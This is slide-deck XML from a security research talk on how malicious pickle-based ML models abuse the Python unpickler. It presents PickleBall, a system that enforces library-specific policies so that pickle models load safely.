          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Google Shape;467;g384641fc418_0_99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68" name="Google Shape;468;g384641fc418_0_99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rPr>
              <a:t>So, why do attackers abuse pickle? </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- Pickle is a very expressive format. Where other serialization formats may only encode the data in model weights and some information about operations, pickle models mix executable code and data.</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Models that use the pickle format are encoded into a series of opcodes. When the model is loaded, these opcodes are executed by a virtual machine implemented in Python’s pickle module - called the “Pickle Machine”. When these opcodes execute, they instantiate the model as a python object and return it to the python program.</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Most of the opcodes are very simple, but they expose functionality to import and invoke Python functions and class constructors (named “callables”). These are needed to construct complex data types like models, and load the weights values from disk.</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These importing and invoking opcodes also give attackers an easy primitive to execute malicious callables – for example, by importing and calling functions like os.system.</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7" name="Shape 477"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="478" name="Google Shape;478;g3818d0781ce_0_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79" name="Google Shape;479;g3818d0781ce_0_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The dangers of pickle are known. Official Python documentation warns users not to deserialization untrusted data.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To protect the ML mode loading problem, we have some existing defenses:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en"/>
            </a:br>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Alternate formats, like Hugging Face’s SafeTensors, are recommended over pickle. These formats are less expressive, and typically only encode weight values.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Model scanners are used to analyze models …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Restricted loaders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5" name="Shape 485"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Google Shape;486;g388d55caf50_0_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87" name="Google Shape;487;g388d55caf50_0_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rPr>
              <a:t>The dangers of pickle are known. Official Python documentation warns users not to deserialization untrusted data. </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rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To protect the ML mode loading problem, we have some existing defenses:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alternate formats, like Hugging Face’s SafeTensors, are recommended over pickle. These formats are less expressive, and typically only encode weight values.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Model scanners are used to analyze models …</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Restricted loaders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5" name="Shape 495"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Google Shape;496;g388d55caf50_0_1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97" name="Google Shape;497;g388d55caf50_0_1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rPr>
              <a:t>The dangers of pickle are known. Official Python documentation warns users not to deserialization untrusted data. </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rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To protect the ML mode loading problem, we have some existing defenses:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alternate formats, like Hugging Face’s SafeTensors, are recommended over pickle. These formats are less expressive, and typically only encode weight values.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Model scanners are used to analyze models …</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Restricted loaders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0" name="Shape 510"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Google Shape;511;g388d55caf50_0_10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12" name="Google Shape;512;g388d55caf50_0_10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rPr>
              <a:t>The dangers of pickle are known. Official Python documentation warns users not to deserialization untrusted data. </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rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To protect the ML mode loading problem, we have some existing defenses:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alternate formats, like Hugging Face’s SafeTensors, are recommended over pickle. These formats are less expressive, and typically only encode weight values.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Model scanners are used to analyze models …</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Restricted loaders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9" name="Shape 529"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Google Shape;530;g388d55caf50_0_6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31" name="Google Shape;531;g388d55caf50_0_6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This raised the question: are pickle models still used in the model ecosystem? Are the existing defenses, like alternate formats and restricted loaders, sufficient?</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1" name="Shape 291"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;g388d55caf50_0_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3" name="Google Shape;293;g388d55caf50_0_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In this work, we contribute:</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A study of the open model ecosystem on Hugging Face, and of the model serialization formats that are used.</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A system for securely loading pickle models, by generating policies specific to libraries, and enforcing the policies</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A dataset of over 300 malicious and benign pickle-based models and pickle programs to evaluate solutions.</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8" name="Shape 538"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="539" name="Google Shape;539;g388d55caf50_0_5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40" name="Google Shape;540;g388d55caf50_0_5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To answer this, we conducted a longitudinal study of the model ecosystem by analyzing models on Huggging Face over a two year period. We found that despite alternate formats, the number of pickle model downloads is actually </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>increasing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, with over 2.1 billion </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>monthly downloads in the last month of the study, up from ~500 million in the first.</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6" name="Shape 546"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="Google Shape;547;g388d55caf50_0_14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48" name="Google Shape;548;g388d55caf50_0_1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We then sampled models from our study to determine whether they could be loaded by the Weights Only Unpickler, and found that 15% of sampled repositories had models that could not be loaded - indicating a usability problem with the weights only unpickler.</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5" name="Shape 555"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Google Shape;556;g388d55caf50_0_8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57" name="Google Shape;557;g388d55caf50_0_8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So, we recognized that pickle model loading is still a security problem.</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4" name="Shape 564"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565" name="Google Shape;565;g388d55caf50_0_9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66" name="Google Shape;566;g388d55caf50_0_9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We asked, how can we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>design</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> a system to fix it?</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3" name="Shape 573"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="574" name="Google Shape;574;g3818d0781ce_0_3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75" name="Google Shape;575;g3818d0781ce_0_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To solve the continuing Pickle security problem and to account for the limitations of existing approaches, we recognize the need for solution that prevents malicious models from executing unnecessary callables, while still permitting benign models to access the callables they need.</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We want to prioritize security, to block all or as many malicious models as possible, while increasing usability of the system to correctly load more benign models.</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Rather than using one-size-fits-all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>approaches, we want to achieve our usability goals with context specific loading policies.</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2" name="Shape 582"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="583" name="Google Shape;583;g3818d0781ce_0_4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84" name="Google Shape;584;g3818d0781ce_0_4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The insight to our approach is that ML libraries are a shared interface between model saving applications and model loading applications.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Engineers use libraries to create and save models - these provide utility functions for training and interacting with models.</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2" name="Shape 592"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="593" name="Google Shape;593;g384641fc418_0_1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94" name="Google Shape;594;g384641fc418_0_1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The engineer will use a library API to create and save a model. If it’s a pickle model, it will have some callables encoded in its representation.</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7" name="Shape 607"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="608" name="Google Shape;608;g384641fc418_0_9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09" name="Google Shape;609;g384641fc418_0_9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To load a model, the user has to use the model loading API from the same library. Once loaded, the library provides an API for interacting with the model, like prediction tasks.</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3" name="Shape 623"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="624" name="Google Shape;624;g384641fc418_0_65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25" name="Google Shape;625;g384641fc418_0_65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Given a model, should it have the imports that it does, or were they placed there maliciously?</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0" name="Shape 640"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="641" name="Google Shape;641;g384641fc418_0_6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42" name="Google Shape;642;g384641fc418_0_6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When determining this, the user of the model does not have access to the program that created the model.</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1" name="Shape 301"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="Google Shape;302;g384641fc418_0_94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3" name="Google Shape;303;g384641fc418_0_94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Today, training models is expensive. The open model ecosystem lets us save money and time by letting us share and reuse pre-trained models from large model hubs, like Hugging Face.</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However, models from these hubs may come from untrusted sources. This lets attackers abuse this trust by creating malicious backdoored models and coercing users into loading them.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Backdoored models might be weights based, which compromise the inference of a model, or they can compromise the system that loads the models by executing arbitrary code.</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This work focuses on backdoors that compromise the system.</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>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7" name="Shape 657"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="658" name="Google Shape;658;g384641fc418_0_60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59" name="Google Shape;659;g384641fc418_0_60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But the user does know the library API that they need to load the model, and which allegedly created the model.</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5" name="Shape 675"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="676" name="Google Shape;676;g384641fc418_0_6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77" name="Google Shape;677;g384641fc418_0_6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We can use the library Model class definition as a specification: we can look to it for evidence of callables that could appear in a model if the library was used to create the model.</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5" name="Shape 695"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="696" name="Google Shape;696;g36676170008_0_8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97" name="Google Shape;697;g36676170008_0_8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We can use the library Model class definition as a specification: we can look to it for evidence of callables that could appear in a model if the library was used to create the model.</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Models that are created by other APIs or programs, including malicious ones, should not fit this specification.</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1" name="Shape 721"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="722" name="Google Shape;722;g3818d0781ce_0_5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23" name="Google Shape;723;g3818d0781ce_0_5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Using this insight, we designed and implemented PickleBall, a novel approach to securely load pickle models.</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PickleBall applies the standard pattern of applying static program analysis to generate a policy, which is enforced during runtime. PickleBall specializes this pattern to account for specific ML and pickle challenges.</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PickleBall is implemented in two components:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>First, policy generation: PickleBall statically analyzes the model class definition in the library source code to create a loading policy that is </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en"/>
              <a:t>specific to the library</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Then, when a model needs to be loaded using the library, PickleBall enforces the policy. At the end of the model loading, PickleBall either returns the loaded model as a Python object, or raises a security exception.</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9" name="Shape 749"/>
